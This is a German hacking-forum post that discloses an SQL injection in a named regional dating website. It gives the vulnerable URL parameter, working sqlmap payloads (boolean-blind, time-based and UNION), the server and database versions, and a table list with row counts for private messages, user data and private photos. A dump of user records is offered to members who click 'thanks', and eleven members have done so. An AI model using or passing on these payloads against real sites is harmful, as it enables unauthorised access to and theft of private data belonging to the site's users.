Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi] Braunschweigflirt.de

- - - - -
Erstellt von Payload ,

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Payload
Geschrieben 05 February 2020 - 02:34 Uhr

Payload

    31er

  • Banned
  • PIPPIPPIPPIPPIP
    • Likes
    4
  • 74 Beiträge
  • 154 Bedankt 
https://www.braunschweigflirt.de/profil.fotos.notiz.php?id=test'

sqlmap identified the following injection point(s) with a total of 132 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-9672' OR 6069=6069-- pEAw

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=test' AND (SELECT 1285 FROM (SELECT(SLEEP(5)))NooW)-- FYVt

    Type: UNION query
    Title: Generic UNION query (random number) - 1 column
    Payload: id=test' UNION ALL SELECT CONCAT(0x71706b6a71,0x4b414a4b4145506c426d57626a5853556d6e496c5347714878464567686667667052556b706c7841,0x71626b7171)-- Bvll
---
web application technology: Apache, PHP 5.3.29
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] braksovb_db1
[*] information_schema

Database: braksovb_db1
[29 tables]
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| nachrichten            | 959281  |
| protokoll              | 112612  |
| profilbesucher         | 89096   |
| ref                    | 44779   |
| orte                   | 44216   |
| user_besucher          | 43015   |
| user_status            | 43015   |
| user_daten             | 35203   |
| user_profile           | 34503   |
| privatfotos            | 28147   |
| user_fotos             | 13034   |
| favoriten              | 12101   |
| user_gb                | 11023   |
| bad_emails             | 8816    |
| ignorierliste          | 3764    |
| geblockt               | 3645    |
| statistik              | 2820    |
| user_auswahl           | 217     |
| kleinanzeigen          | 124     |
| user_echtheitfotos     | 123     |
| kleinanzeigen_rubriken | 16      |
| login                  | 8       |
| kunden                 | 6       |
| gesperrt               | 1       |
| rundmail               | 1       |
| status                 | 1       |
+------------------------+---------+

Dump der "user_daten":

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.


Es gibt tausendundeinen Grund, warum ein Mensch bestimmte Einzelheiten seiner Privatsphäre nicht offenbaren will, und es besteht nicht die geringste Pflicht, dies auch noch aktzeptieren zu müssen.

Thanked by 11 Members:
pimphero , elcapitano , twixeis , mashok , parisdefr , Taback , c3pox86 , Zero00m , matrix567 , Exynos , x1z0ng
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 6 user(s)


    Bot4ng, kiwitone, lalago, pimphero, Saarlodri, Yuka
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking